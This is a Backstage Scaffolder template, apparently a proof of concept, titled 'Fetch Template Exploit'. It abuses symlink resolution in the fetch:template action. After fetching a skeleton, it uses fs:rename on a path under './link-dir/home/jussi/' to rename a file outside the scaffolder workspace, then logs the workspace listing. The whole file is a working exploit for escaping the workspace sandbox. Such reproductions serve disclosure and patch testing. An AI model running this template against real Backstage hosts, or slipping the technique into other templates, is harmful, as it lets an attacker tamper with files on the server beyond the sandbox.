apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: fetch-template-exploit
  title: Fetch Template Exploit
  description: "A Scaffolder template exploiting symlink resolving in fetch:template action"

spec:
  type: service
  owner: user:guest
  steps:

    - id: fetchTemplate
      name: Fetch file
      action: fetch:template
      input:
        url: ./skeleton

    - id: renameOneOfTheRootFiles
      name: Rename a file at root
      action: fs:rename
      input:
        files:
          - from: ./link-dir/home/jussi/logfile
            to: ./link-dir/home/jussi/logfileRenamed.txt

    - id: log-message
      name: Log Message
      action: debug:log
      input:
        listWorkspace: true
